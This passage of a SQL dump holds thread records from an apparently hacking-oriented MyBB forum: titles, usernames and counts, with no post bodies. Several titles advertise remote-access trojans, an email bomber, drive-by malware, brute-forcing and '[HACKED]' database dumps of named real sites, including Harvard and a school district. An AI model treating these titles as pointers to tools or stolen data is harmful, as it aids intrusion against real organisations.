`poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('664', '61', '100+ Shells', '0', '0', '0', '82', 'iTzIpod', '1349392517', '3380', '1349392517', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('665', '19', '[Junk]$5 Giveaway Contest', '0', '0', '0', '3', '??????????¢™', '1349392591', '3381', '1349393506', 'iTzIpod', '82', '12', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('667', '7', 'can you guys help me spread?', '0', '0', '0', '203', 'NeonLights', '1349400907', '3391', '1349405079', 'NeonLights', '203', '22', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('666', '61', 'Detailed Animation Tutorial', '0', '0', '0', '82', 'iTzIpod', '1349393036', '3383', '1349393036', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('799', '15', 'Darkcomet rat 5.4 Legacy Beta', '0', '0', '0', '203', 'NeonLights', '1349887269', '4158', '1350752208', 't3h jok3r', '1', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('669', '12', 'Hacking: The Art of Exploitation, 2nd Edition', '0', '0', '0', '203', 'NeonLights', '1349405460', '3404', '1349405460', 'NeonLights', '203', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('670', '16', '[Guide]How to get free Blizzard games/products.', '0', '0', '0', '5', 'Timmy', '1349407976', '3408', '1349438713', 'R?????zo?', '62', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('671', '16', '[Guide]How to get free Blizzard games/products.', '0', '0', '0', '5', 'Timmy', '1349407976', '0', '1349407976', 'Timmy', '5', '0', '0', 'moved|670', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('672', '30', 'Blackshades NET [Setup + download]', '0', '0', '0', '5', 'Timmy', '1349408107', '3409', '1349736520', 'NeonLights', '203', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('673', '29', 'The only allowed \"how to deep web\" tutorial here.', '0', '0', '0', '5', 'Timmy', '1349408360', '3410', '1349921461', 'Timmy', '5', '32', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('675', '65', 'The Julian Assange Story', '0', '0', '0', '205', 'mothered', '1349413453', '3426', '1349413453', 'mothered', '205', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('676', '12', 'Cracking Tuts/Reverse Enginnering', '0', '0', '0', '205', 'mothered', '1349414067', '3427', '1349501384', 'mothered', '205', '18', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('677', '24', 'Windows Memory Limits', '0', '0', '0', '205', 'mothered', '1349414429', '3428', '1351030305', 'dccfoux', '285', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('678', '29', 'Get Free Domain names & Webhosting Packages e-Book [Written by me!]', '0', '0', '0', '172', 'MistaCode', '1349443882', '3446', '1350060722', 'MistaCode', '172', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('679', '4', 'flamingworm here!', '0', '0', '0', '222', 'Exposé', '1349462521', '3449', '1349552170', 'p420', '9', '60', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('680', '35', 'Some of my works...', '0', '0', '0', '222', 'Exposé', '1349463351', '3457', '1349552258', 'p420', '9', '44', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('682', '49', 'Hmm', '0', '0', '0', '219', 'kaitlin', '1349465888', '3478', '1349495892', 'Exposé', '222', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('681', '49', 'Chatbox....', '0', '0', '0', '222', 'Exposé', '1349464870', '3466', '1349465103', 'iTzIpod', '82', '5', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('684', '19', '[Junk]Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '0', '0', '1', 't3h jok3r', '1349473660', '3498', '1349661206', 't3h jok3r', '1', '8', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('683', '61', '[Request] Twitter Bot?', '0', '0', '0', '82', 'iTzIpod', '1349472888', '3489', '1349472888', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('689', '19', '[Junk]Test', '0', '0', '0', '8', 'spacefish36', '1349475259', '3511', '1350855840', 'VirtualLegend', '228', '8', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('685', '13', '[HACKED] http://www.mahrukat.gov.sy/ database dump', '0', '0', '0', '223', 'StarZ', '1349474733', '3505', '1349474733', 'StarZ', '223', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('686', '13', '[HACKED] www.piedmont.k12.ca.us database dumped :3', '0', '0', '0', '223', 'StarZ', '1349474767', '3506', '1349474767', 'StarZ', '223', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('687', '13', '[HACKED] mclean.harvard.edu', '0', '0', '0', '223', 'StarZ', '1349474800', '3507', '1349476016', 'StarZ', '223', '16', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('688', '67', '[PHP] Email Bomber Source', '0', '0', '0', '12', 'jonas83', '1349474965', '3508', '1350823480', 'VirtualLegend', '228', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('690', '69', 'What are your fav or which coding languages do you know?', '0', '0', '0', '1', 't3h jok3r', '1349477700', '3516', '1350702581', 'Timmy', '5', '47', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('691', '3', 'Gaming Section Released', '0', '0', '0', '1', 't3h jok3r', '1349479781', '3517', '1349562423', 'mothered', '205', '26', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('692', '71', 'COD Black OPs or COD MW3?', '0', '0', '0', '5', 'Timmy', '1349480570', '3518', '1350112717', 'XxTREYZxX', '257', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('693', '7', 'Hmmm?', '0', '0', '0', '3', '??????????¢™', '1349481345', '3525', '1349495575', 'Exposé', '222', '28', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('694', '71', 'Gamers Recruitment', '0', '0', '0', '61', 'NXK', '1349489163', '3535', '1349489163', 'NXK', '61', '17', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('696', '13', '[HACKED] http://content.hks.harvard.edu', '0', '0', '0', '223', 'StarZ', '1349495564', '3550', '1349501541', 'mothered', '205', '22', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('695', '16', 'If you need help...i\'m here!', '0', '0', '0', '222', 'Exposé', '1349490202', '3540', '1349686910', 'R?????zo?', '62', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('698', '7', 'Skype group anyone?', '0', '0', '0', '222', 'Exposé', '1349495981', '3557', '1349703108', 'iTzIpod', '82', '19', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('697', '74', 'Who plays Minecraft out here?', '0', '0', '0', '1', 't3h jok3r', '1349495847', '3554', '1350113596', 'XxTREYZxX', '257', '31', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('700', '7', 'I\'m thirsty....what\'s your favorite drinks?', '0', '0', '0', '222', 'Exposé', '1349497812', '3572', '1349552825', 'p420', '9', '18', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('699', '47', '[All Members] Advance Member System', '0', '0', '0', '3', '??????????¢™', '1349496029', '3559', '1350427486', '??????????¢™', '3', '44', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('701', '49', 'Change Font in Logo?', '0', '0', '0', '222', 'Exposé', '1349499415', '3584', '1349845641', 't3h jok3r', '1', '41', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('702', '35', 'You guys like my new userbar?', '0', '0', '0', '222', 'Exposé', '1349502157', '3593', '1350186704', 'XxTREYZxX', '257', '38', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('703', '61', '[Request] Spreading eBook', '0', '0', '0', '100', '??zg???g????61', '1349525172', '3606', '1349525172', '??zg???g????61', '100', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('704', '66', 'Minecraft Accounts', '0', '0', '0', '82', 'iTzIpod', '1349533993', '3616', '1350259799', 'XxTREYZxX', '257', '23', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('705', '61', 'Minecraft Accounts', '0', '0', '0', '82', 'iTzIpod', '1349534141', '3617', '1349620761', 'iTzIpod', '82', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('730', '72', 'Need for Speed Most Wanted limited edition', '0', '0', '0', '1', 't3h jok3r', '1349548040', '3677', '1350202492', 'spacefish36', '8', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('706', '4', 'Supppp', '0', '0', '0', '214', 'Rave™', '1349541493', '3633', '1349636137', 'Anonymous™', '199', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('707', '13', 'How to migrate CRACKED minecraft accounts!', '0', '0', '0', '214', 'Rave™', '1349541573', '3634', '1349547508', 'iTzIpod', '82', '13', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('708', '16', 'EA Games', '0', '0', '0', '214', 'Rave™', '1349541618', '3635', '1349541618', 'Rave™', '214', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('709', '16', 'SE Microsoft', '0', '0', '0', '214', 'Rave™', '1349541657', '3636', '1349541657', 'Rave™', '214', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('710', '12', 'Ultimate Spreading Guide', '0', '0', '0', '214', 'Rave™', '1349541907', '3637', '1350563972', 'VirtualLegend', '228', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('711', '16', '[EASY] SE Books', '0', '0', '0', '214', 'Rave™', '1349541964', '3638', '1349541964', 'Rave™', '214', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('712', '13', 'SQL Injection Ebook', '0', '0', '0', '214', 'Rave™', '1349542033', '3639', '1349842309', 'mothered', '205', '13', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('713', '12', 'How To Make A FUD Java Drive-By', '0', '0', '0', '214', 'Rave™', '1349542067', '3640', '1349753683', 'NXK', '61', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('714', '3', 'Spam Bot Bug', '0', '0', '0', '214', 'Rave™', '1349542427', '3641', '1349542427', 'Rave™', '214', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('715', '23', 'Free HostGator Hosting! [N00B Friendly]', '0', '0', '0', '214', 'Rave™', '1349542488', '3642', '1349607512', 'mothered', '205', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('716', '16', 'Roku 2 XD', '0', '0', '0', '214', 'Rave™', '1349542540', '3643', '1349867311', '??zg???g????61', '100', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('717', '12', 'How to Bruteforce VPS!', '0', '0', '0', '214', 'Rave™', '1349542596', '3644', '1350014940', 'mothered', '205', '19', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('718', '16', 'Apple Cookie Case', '0', '0', '0', '214', 'Rave™', '1349542676', '3645', '1349613997', '??zg???g????61', '100', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('719', '16', 'AstroPID Clean', '0', '0', '0', '214', 'Rave™', '1349542721', '3646', '1351951489', 'iTzIpod', '82', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, 